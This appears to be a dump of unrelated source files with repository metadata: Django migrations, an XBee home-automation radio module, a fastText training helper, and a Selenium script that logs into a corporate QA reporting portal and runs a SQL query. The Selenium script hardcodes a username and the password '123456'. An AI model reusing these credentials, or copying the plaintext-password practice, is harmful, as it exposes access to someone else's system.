('ad_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['advertising.AdvertisingType'])),
('ad_company', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['advertising.AdvertisingCampaign'])),
('payment_type', self.gf('django.db.models.fields.CharField')(max_length=3)),
('ads_image', self.gf('django.db.models.fields.files.ImageField')(max_length=100)),
('reviewed', self.gf('django.db.models.fields.BooleanField')(default=False)),
('cpm_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpm_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('cpc_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpc_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
))
db.send_create_signal(u'advertising', ['Advertising'])
def backwards(self, orm):
# Deleting model 'AdvertisingType'
db.delete_table(u'advertising_advertisingtype')
# Deleting model 'AdvertisingCampaign'
db.delete_table(u'advertising_advertisingcampaign')
# Removing M2M table for field regions on 'AdvertisingCampaign'
db.delete_table('advertising_advertisingcampaign_regions')
# Deleting model 'Advertising'
db.delete_table(u'advertising_advertising')
models = {
u'accounts.account': {
'Meta': {'object_name': 'Account'},
'about_me': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'access_token': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'blog_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
'facebook_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'facebook_open_graph': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'facebook_profile_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_the_loop_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'in_the_loop_phonenumber': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'in_the_loop_with_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'in_the_loop_with_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'in_the_loop_with_website': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'blank': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'raw_data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'reminder_active_type': ('django.db.models.fields.CharField', [], {'default': "'HOURS'", 'max_length': '10'}),
'reminder_days_before_event': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'reminder_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'reminder_events': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['event.Event']", 'null': 'True', 'blank': 'True'}),
'reminder_hours_before_event': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'reminder_on_week_day': ('django.db.models.fields.CharField', [], {'default': '0', 'max_length': '1', 'null': 'True', 'blank': 'True'}),
'reminder_on_week_day_at_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'reminder_phonenumber': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'reminder_with_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'reminder_with_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'reminder_with_website': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['event.Venue']", 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'website_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'advertising.advertising': {
'Meta': {'object_name': 'Advertising'},
'ad_company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['advertising.AdvertisingCampaign']"}),
'ad_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['advertising.AdvertisingType']"}),
'ads_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'cpc_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpc_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'cpm_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpm_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'payment_type': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'reviewed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'advertising.advertisingcampaign': {
'Meta': {'object_name': 'AdvertisingCampaign'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.Account']"}),
'all_of_canada': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ammount_remaining': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'ammount_remaining_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'ammount_spent': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'ammount_spent_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'budget': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'budget_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'ended': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['cities.Region']", 'symmetrical': 'False'}),
'started': ('django.db.models.fields.DateTimeField', [], {})
},
u'advertising.advertisingtype': {
'Meta': {'object_name': 'AdvertisingType'},
'cpc_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpc_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'cpm_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpm_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'height': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'width': ('django.db.models.fields.IntegerField', [], {})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'cities.city': {
'Meta': {'object_name': 'City'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Region']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'subregion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Subregion']", 'null': 'True', 'blank': 'True'})
},
u'cities.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tld': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
u'cities.region': {
'Meta': {'object_name': 'Region'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'cities.subregion': {
'Meta': {'object_name': 'Subregion'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Region']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'event.event': {
'Meta': {'object_name': 'Event'},
'audited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'authentication_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 5, 9, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}),
'cropping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'featured_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 5, 9, 0, 0)', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.CharField', [], {'default': "'Free'", 'max_length': '40', 'blank': 'True'}),
'search_index': ('djorm_pgfulltext.fields.VectorField', [], {'default': "''", 'null': 'True', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'tickets': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['event.Venue']", 'null': 'True', 'blank': 'True'}),
'viewed_times': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'event.venue': {
'Meta': {'object_name': 'Venue'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.City']"}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Default Venue'", 'max_length': '250'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
complete_apps = ['advertising']
|
[
"danialaftab@ucp.edu.pk"
] |
danialaftab@ucp.edu.pk
|
4e0b023472d01e665a666a9df645d52d62215dc1
|
b6216c94621d77483c751d4bb1839174bfdef0bb
|
/radio.py
|
bff61662d822b10bdf966ec31b0c8e54e8ac3401
|
[] |
no_license
|
jsdelivrbot/SmartHome
|
50bf995f08e2c718ddc7b6ae74c718c1e7d80235
|
12606823482e538cb24fea37f6b41079a50f4c0d
|
refs/heads/master
| 2020-04-10T15:02:13.948495
| 2018-12-10T00:19:52
| 2018-12-10T00:19:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,799
|
py
|
import serial, sys
import datetime
from xbee import XBee
from thing_speak import *
from pushover import *
def calc_ac_message(args, logger):
message = '111000' # prefix
message += ('01' if args['on_off-changed'] == 'true' else '10') # on_off
message += ('101001' if args['mode'] == 'cool' else '100110') # mode
fan_options = {'1': '1010',
'2': '1001',
'3': '0110',
'A': '0101'
}
message += fan_options[args['fan']] # fan
message += '1010101010'
temp_options = {'16': '10101001',
'17': '10100110',
'18': '10100101',
'19': '10011010',
'20': '10011001',
'21': '10010110',
'22': '10010101',
'23': '01101010',
'24': '01101001',
'25': '01100110',
'26': '01100101',
'27': '01011010',
'28': '01011001',
'29': '01010110',
'30': '01010101'
}
message += temp_options[args['temp']] #temp
message += '10101010101010101010101010101010100110'
    message += message + message  # message now holds three identical copies of the frame
message += '1111000000'
#logger.info("message={}".format(message))
data = ''
while len(message) > 0:
data += chr(int(message[:8],2))
message = message[8:]
#logger.info("data={}".format(data))
return data
class Radio:
def __init__(self):
self.serial_port = serial.Serial('/dev/ttyAMA0', 19200)
self.xbee = XBee(self.serial_port, callback=self.handle_received_data)
def handle_received_data(self, data):
if 'source_addr' in data and 'rf_data' in data:
device = self.status_updater.get_device_by_address(data['source_addr'], ord(data['rf_data'][0]))
rf_data = '\\'.join(x.encode('hex') for x in data['rf_data'])
print "[{}] - Receiving data from {}: {}, rssi:{} dBm".format(datetime.datetime.now(), device['name'], rf_data, -ord(data['rssi']))
if device is not None:
if device['type'] == 'shutter':
status = {'mode' : str(ord(data['rf_data'][1]))}
if device['type'] == 'shutterNew':
status = {'mode' : str(ord(data['rf_data'][1]))}
if device['type'] == 'temperature':
temperature = float(ord(data['rf_data'][1])*256+ord(data['rf_data'][2]))/10
rh = float(ord(data['rf_data'][3])*256+ord(data['rf_data'][4]))/10
status = {'Temp' : str(temperature), 'Rh' : str(rh)}
ThingSpeak_update_DHT22(temperature, rh)
if device['type'] == 'boiler':
now = datetime.datetime.now()
date = datetime.datetime.today().strftime('%Y-%m-%d')
curr_hour = "{}:{}".format(str(now.hour).zfill(2), str(now.minute).zfill(2))
mode = ord(data['rf_data'][1])
status = {'mode' : str(mode),
'time' : curr_hour,
'date' : date
}
if device['type'] == 'boiler_temperature':
temperature = float((ord(data['rf_data'][2]) << 8) | (ord(data['rf_data'][1]) << 0)) / float(256)
if temperature > 255:
return
device = self.status_updater.get_device_by_address(data['source_addr'], 1)
status = {'Temp': str(temperature)}
ThingSpeak_update_DS18B20(temperature)
if device['type'] == 'air_conditioner':
status = {'on_off' : ('false' if data['rf_data'][1] == '\x01' else 'true') }
if status is not None:
self.status_updater.update_device_status(device, status)
def close(self):
self.xbee.halt()
self.serial_port.close()
def update_shutter(self, addr, device_number, args):
shutter_options = {'100': '\x01',
'0': '\x02',
'pause': '\x03',
'25': '\x04',
'50': '\x05',
'75': '\x06',
}
data = shutter_options[args['mode']]
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_shutterNew(self, addr, device_number, args):
data = "\x02" if args['mode'] == 'pause' else ("\x01" + chr(int(args['mode'])))
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_boiler(self, addr, device_number, args):
if(args.has_key('mode')):
data = chr(int(args['mode']))
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_temperature(self, addr, device_number, args):
data = 0
def update_boiler_temperature(self, addr, device_number, args):
data = 0
def update_air_conditioner(self, addr, device_number, args):
data = calc_ac_message(args, self.logger)
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+chr(1)+data))
def set_status_updater(self, status_updater):
self.status_updater = status_updater
def set_logger(self, logger):
self.logger = logger
class DummyRadio:
def __init__(self):
print "Starting DummyRadio..."
def close(self):
self.logger.info("Bye Bye")
def update_shutter(self, addr, device_number, args):
self.logger.info("shutter={},{} args={}".format(addr, device_number, args))
def update_shutterNew(self, addr, device_number, args):
self.logger.info("shutterNew={},{} args={}".format(addr, device_number, args))
def update_air_conditioner(self, addr, device_number, args):
self.logger.info("air conditioner={},{}, args={}".format(addr, device_number, args))
calc_ac_message(args, self.logger)
def set_status_updater(self, status_updater):
self.status_updater = status_updater
def set_logger(self, logger):
self.logger = logger
|
[
"oded.tgr@gmail.com"
] |
oded.tgr@gmail.com
|
6e81587254659967305cf40abc42b70bb68fd223
|
3c74f6ace4a323d9778cc41a15b660a1796a3a5f
|
/src/feature_engineering/fastText_benchmark.py
|
7a1868d73308be1e31901bf39158f41aa13e47e5
|
[] |
no_license
|
drvshavva/Sentiment_analysis
|
476e276745594e58da8cd3c07bdadcf3d72ac2ad
|
38cdfa4c96bf7c239a1be81436248d13e704b31a
|
refs/heads/main
| 2023-05-03T19:54:15.155966
| 2021-05-21T17:35:46
| 2021-05-21T17:35:46
| 369,609,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 997
|
py
|
from gensim.models.fasttext import FastText
import multiprocessing
from sklearn import utils
from tqdm import tqdm
from os.path import dirname
tqdm.pandas(desc="progress-bar")
MODEL_PATH = dirname(dirname(dirname(__file__))) + "/models/word2vec/"
def train_fasText(corpus, n_epoch, name_corpus, sg, vector_size, negative, window, min_count, alpha, min_n, max_n):
cores = multiprocessing.cpu_count()
model = FastText(sg=sg, size=vector_size, negative=negative, window=window, min_count=min_count, workers=cores,
alpha=alpha, min_n=min_n, max_n=max_n)
model.build_vocab([x.words for x in tqdm(corpus)])
for epoch in range(n_epoch):
model.train(utils.shuffle([x.words for x in tqdm(corpus)]), total_examples=len(corpus), epochs=1)
model.alpha -= 0.002
model.min_alpha = model.alpha
model.save(
f"{MODEL_PATH}fastText_{name_corpus}_sg_{sg}_size_{vector_size}_window_{window}_min_count_{min_count}.model")
return model
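# Hypothetical usage sketch (not part of the original file): `corpus` is
# assumed to be a list of objects exposing a `.words` token list, e.g. gensim
# TaggedDocument instances built elsewhere in this project.
# model = train_fasText(corpus, n_epoch=5, name_corpus="reviews", sg=1,
#                       vector_size=100, negative=5, window=5, min_count=2,
#                       alpha=0.025, min_n=3, max_n=6)
# vec = model.wv["film"]  # subword n-grams also cover out-of-vocabulary tokens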
|
[
"havvanur.dervisoglu@ithinka.com"
] |
havvanur.dervisoglu@ithinka.com
|
56f8c34e87096b7ccc618901f772eef0470f64d3
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_22467.py
|
5a358bc5c1aa3fc341e934a1ba21ccff3415ae08
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
# Python: Cancel object creation during initialization
data = [good, bad]
theList = [obj for obj in (MyObject(some_data) for some_data in data) if obj.data_is_valid]
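# A minimal self-contained sketch of the same pattern; MyObject, good and bad
# are hypothetical stand-ins, since the original snippet leaves them undefined:
class MyObject(object):
    def __init__(self, some_data):
        # validation happens during __init__; invalid objects are filtered
        # out of the final list rather than "cancelled" mid-construction
        self.data = some_data
        self.data_is_valid = some_data is not None

good, bad = {"x": 1}, None
data = [good, bad]
theList = [obj for obj in (MyObject(d) for d in data) if obj.data_is_valid]
assert len(theList) == 1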
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
4f64dd7851c54271eb27e872a0ffe121a7888fdd
|
447630c97d47bba555169bb336f692adcf6bb97c
|
/Website2/migrations/0002_auto_20201116_1857.py
|
6ccf25e8496904141f3f74acbad21dab1555db50
|
[] |
no_license
|
vinothini-jr/OwnBlogWebsite
|
e4a44654fe368c14d4d91e94214a9f3e5ac73148
|
6e37b0a687a313c437f46a51b1c6a8c9b94d504d
|
refs/heads/master
| 2023-02-19T11:22:24.620131
| 2021-01-20T13:55:07
| 2021-01-20T13:55:07
| 331,258,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
# Generated by Django 3.0.5 on 2020-11-16 13:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Website2', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='comment',
old_name='post',
new_name='posti',
),
]
|
[
"vinothinivno@gmail.com"
] |
vinothinivno@gmail.com
|
a4e61da72d38c7802c7f6964d9362e6ed62a8871
|
f0a5ad7b8aa39f51f233391fead0da3eabecc4ee
|
/.history/toolbox/baixaArquivo_20191127165502.py
|
d63cb56da0f775cc4431f9f1049aafaa065fdfab
|
[] |
no_license
|
OseiasBeu/webScrapping
|
e0a524847e55b24dbbd3d57bbe7fa43b4e101f48
|
1e72c7551aea355a891043baecfcbab8a89e719a
|
refs/heads/master
| 2022-10-25T18:12:50.858653
| 2020-06-18T01:29:24
| 2020-06-18T01:29:24
| 224,681,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,884
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
import os
import tempfile
import time
import shutil
import glob
def baixaArquivo():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-qa.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = '123456'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records =driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys("Sem limite") #ctl00_ContentPlaceHolder1_imbExecutar
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
time.sleep(5)
# chrome_options = Options()
# download_dir = tempfile.mkdtemp()
# try:
# chrome_options.add_experimental_option('prefs', {
# "plugins.plugins_list": [{"enabled":False,"name":"Chrome PDF Viewer"}],
# "download": {
# "prompt_for_download": False,
# "default_directory" : download_dir
# }
# })
# #...
#
# while glob.iglob(os.path.join(download_dir, '*.crdownload')):
    #         time.sleep(1) # wait for the download to finish
    #     # grab the first pdf found; there will be only one, since the folder was empty before:
# arquivo = glob.iglob(os.path.join(download_dir, '*.xlsx'))[0]
# shutil.move(arquivo, r'C:\Users\beuo\Documents\Demandas\AtualizaMiddleIntegrationVtex\files\*.xlsx')
# # finally:
    # #     shutil.rmtree(download_dir) # remove all the temporary files
# exportar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExportExcel").click()
resultados = driver.find_elements_by_tag_name('span')
print(resultados[0])
# https://docs.google.com/spreadsheets/d/1QSGAY_WyamEQBZ4ITdAGCVAbavR9t-D-4gPQx4Sbf7g/edit?ts=5ddea57e#gid=63583812
time.sleep(10)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
# print(query)
time.sleep(10)
driver.close()
|
[
"oseiasbeu@outlook.com"
] |
oseiasbeu@outlook.com
|
9cddda31ed48e2585ce38b7a8cf02df46126b51b
|
8dfe4b53fae92795405d789d52148d1291836afa
|
/.metadata/.plugins/org.eclipse.core.resources/.history/ba/f0bcb1d8c11d00171d43c367bf888dd0
|
c9bbb419225ed46c34895afd15e68cbdfec35a09
|
[] |
no_license
|
ymyjohnny/python
|
e07c54a88954e090cf3d30a4c6f6ac46353063fb
|
b483fd55e577d4dcceb5762bddf833df23874f3a
|
refs/heads/master
| 2021-01-10T01:10:19.038424
| 2019-07-02T02:40:23
| 2019-07-02T02:40:23
| 45,223,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
#!/usr/bin/python
#coding=utf-8
'''
Created on 2017-4-10
@author:ymy
